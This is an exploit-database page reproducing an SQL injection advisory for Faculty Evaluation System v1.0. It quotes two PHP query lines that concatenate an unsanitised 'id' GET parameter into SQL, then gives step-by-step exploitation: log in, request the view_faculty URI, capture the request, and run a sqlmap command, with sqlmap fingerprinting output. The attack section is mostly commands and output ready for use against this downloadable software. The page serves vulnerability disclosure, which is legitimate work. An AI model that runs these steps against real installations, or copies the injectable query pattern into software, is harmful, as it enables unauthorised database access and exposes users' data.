Advertisement






Faculty Evaluation System v1.0 SQL Injection

CVE Category Price Severity
CVE-YYYY-XXXX CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown Critical Remote 2023-07-21
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023070046

Below is a copy:

Faculty Evaluation System v1.0 SQL Injection
# Exploit Title: Faculty Evaluation System v1.0 - SQL Injection
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip
# Version: 1.0
# Tested on: Windows Server 2022


SQLi #1

File: edit_evaluation

Line #4
$qry = $conn->query("SELECT * FROM ratings where id = ".$_GET['id'])->fetch_array();
[...]


SQLi #2

File: view_faculty.php

Line #4

// Add "id" parameter after "view_faculty" parameter then add equals "id" with integer
[...]
$qry = $conn->query("SELECT *,concat(firstname,' ',lastname) as name FROM faculty_list where id = ".$_GET['id'])->fetch_array();
[...]


Steps to Exploit:

1. Login to application
2. Browse to following URI "http://host/eval/index.php?page=view_faculty&id=1"
3. Copy request to intercept proxy to file
4. Exploit using SQLMap


sqlmap -r test.txt  --threads 1 --dbms=mysql --fingerprint

[...]
[INFO] testing MySQL
[INFO] confirming MySQL
[INFO] the back-end DBMS is MySQL
[INFO] actively fingerprinting MySQL
[INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
               comment injection fingerprint: MySQL 5.6.49
               fork fingerprint: MariaDB
[...]

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.